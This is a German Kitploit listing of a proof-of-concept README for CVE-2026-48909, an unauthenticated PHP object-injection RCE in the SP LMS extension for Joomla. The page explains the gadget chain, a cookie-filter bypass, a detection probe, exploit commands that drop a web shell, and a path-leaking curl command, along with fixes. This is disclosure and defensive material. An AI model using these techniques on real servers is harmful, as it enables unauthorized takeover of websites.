Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-48909 — Proof-of-Concept-Exploit für CVE-2026-48909: nicht authentifizierte Remote-Code-Ausführung durch PHP-Objektinjektion in JoomShaper SP LMS. Enthält Anleitungen zur Erkennung, Ausnutzung und Behebung. | Kitploit
Tools/GitHubGitHub/is4yev/cve-2026-48909
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubis4yev/cve-2026-48909

CVE-2026-48909

Proof-of-Concept-Exploit für CVE-2026-48909: nicht authentifizierte Remote-Code-Ausführung durch PHP-Objektinjektion in JoomShaper SP LMS. Enthält Anleitungen zur Erkennung, Ausnutzung und Behebung.

Repository anzeigen
232vor 1 MonatVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-48909 — SP LMS PHP Object Injection → RCE

CVE CVSS CWE Affected Fixed

Nicht authentifizierte Remote Code Execution durch PHP Object Injection in JoomShaper SP LMS (com_splms) ≤ 4.1.3 für Joomla CMS.

Autor: Amin İsayev / Proxima Cyber Security


Überblick

SP LMS ist eine beliebte Joomla-Lernmanagement-Erweiterung von JoomShaper mit über 100.000 Installationen. Versionen ≤ 4.1.3 übergeben das lmsOrders-Cookie direkt an unserialize(), ohne jegliche Validierung. Dadurch kann ein nicht authentifizierter Angreifer ein bösartiges PHP-Objekt injizieren und über die native Gadget-Chain von Joomla Remote Code Execution erlangen.


Schwachstelle

Grundursache

components/com_splms/models/cart.php Zeile 28:

root@kitploit:~
$cookie  = Factory::getApplication()->input->cookie;
$raw     = $cookie->get('lmsOrders', base64_encode(serialize(array())));
$decoded = base64_decode($raw);
$cartItems = unserialize($decoded);   // ← ungeprüfte Benutzereingabe

Das lmsOrders-Cookie wird base64-dekodiert und direkt an unserialize() übergeben. Ein Angreifer kontrolliert das deserialisierte Objekt vollständig.

Gadget-Chain

Die Klasse FormattedtextLogger von Joomla stellt das Gadget bereit:

root@kitploit:~
lmsOrders-Cookie (vom Angreifer kontrolliert)
  └─► unserialize()                             [cart.php:28]
        └─► FormattedtextLogger.__destruct()    [Joomla-Gadget]
              └─► initFile() → File::write($path, $format)
                    └─► PHP-Code auf Datenträger geschrieben → RCE

Hinweis: RCE erfordert Joomla < 5.2.2.
Joomla 5.2.2 hat FormattedtextLogger.__wakeup() gepatcht (siehe PR #44428).
Die PHP Object Injection besteht in com_splms ≤ 4.1.3 auf allen Joomla-Versionen weiterhin.

Filter-Umgehung

Joomlas Input\Cookie::get() wendet standardmäßig einen cmd-Filter an, der +, / und = aus dem Cookie-Wert entfernt — Zeichen, die in standardmäßigem Base64 vorkommen. Der Exploit verwendet:

  • hex2bin()-Kodierung, um verbotene PHP-Zeichen ($, _, {, }, \n) zu vermeiden
  • Padding-Ausrichtung, um sicherzustellen, dass die Base64-Länge durch 3 teilbar ist (kein =-Padding)
  • Padding-Zeichen-Iteration (62 Varianten), um / und + aus der Base64-Ausgabe zu eliminieren

Proof of Concept

Erkennung

root@kitploit:~
python3 CVE-2026-48909.py https://target.com
root@kitploit:~
[*] Target : https://target.com
[*] Path   : /index.php?option=com_splms&view=cart
[*] Probe  : lmsOrders=Tzo4OiJzdGRDbGFzcyI6MDp7fQ==

[VULNERABLE] HTTP 500 on probe vs 200 on benign — unserialize() called on cookie
[!] Update to SP LMS >= 4.1.4 immediately.

Exploit

root@kitploit:~
python3 CVE-2026-48909_exploit.py https://target.com /var/www/html/tmp/x.php

PoC-Screenshot

Shell aktiv unter https://target.com/tmp/x.php?c=id

Den Serverpfad ermitteln (falls unbekannt):

root@kitploit:~
# cPanel-Hosting — Pfad wird aus Joomla-Fehlerseiten geleakt
curl -sk "https://target.com/administrator/" | grep -oP '\/home\d*\/[^"<\s]+'

# Häufige Pfade zum Ausprobieren:
#   /var/www/html/tmp/x.php
#   /home/USER/public_html/tmp/x.php
#   /var/www/vhosts/DOMAIN/httpdocs/tmp/x.php

Anforderungen

root@kitploit:~
pip install requests

Python 3.10+


Fix / Abhilfe

  1. Aktualisieren Sie SP LMS sofort auf Version ≥ 4.1.4
  2. Aktualisieren Sie Joomla auf ≥ 5.2.2, um die Gadget-Chain zu entfernen
  3. Als Übergangsmaßnahme — das lmsOrders-Cookie vor der Deserialisierung validieren und bereinigen:
root@kitploit:~
// Verwenden Sie KEIN unserialize() für benutzerkontrollierte Daten
// Verwenden Sie stattdessen json_encode/json_decode
$cartItems = json_decode(base64_decode($raw), true) ?? [];

Referenzen

  • CVE-2026-48909 — cve.org
  • CVE-2026-48909 — NVD
  • GHSA-gf8c-xmwj-whrh — GitHub Advisory
  • Joomla PR #44428 — FormattedtextLogger-Gadget-Patch
  • CWE-502: Deserialization of Untrusted Data
  • OWASP: PHP Object Injection

Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests veröffentlicht.
Der Autor ist nicht verantwortlich für Missbrauch oder Schäden, die durch dieses Programm verursacht werden.
Verwenden Sie es nicht gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Erlaubnis zum Testen haben.


Amin İsayev / Proxima Cyber Security — 2026

Tool herunterladen
FeldDetails
CVE-IDCVE-2026-48909
GHSAGHSA-gf8c-xmwj-whrh
BetroffenSP LMS (com_splms) 1.0.0 – 4.1.3
Behoben inSP LMS ≥ 4.1.4
Joomla-Anforderung< 5.2.2 (Gadget-Chain in 5.2.2 gepatcht)
CVSS 4.09.5 Critical — AV:N/AC:L/AT:P/PR:N/UI:N
CWECWE-502: Deserialization of Untrusted Data
Authentifizierung erforderlichKeine
Offengelegt2026-05-26
Veröffentlicht2026-06-20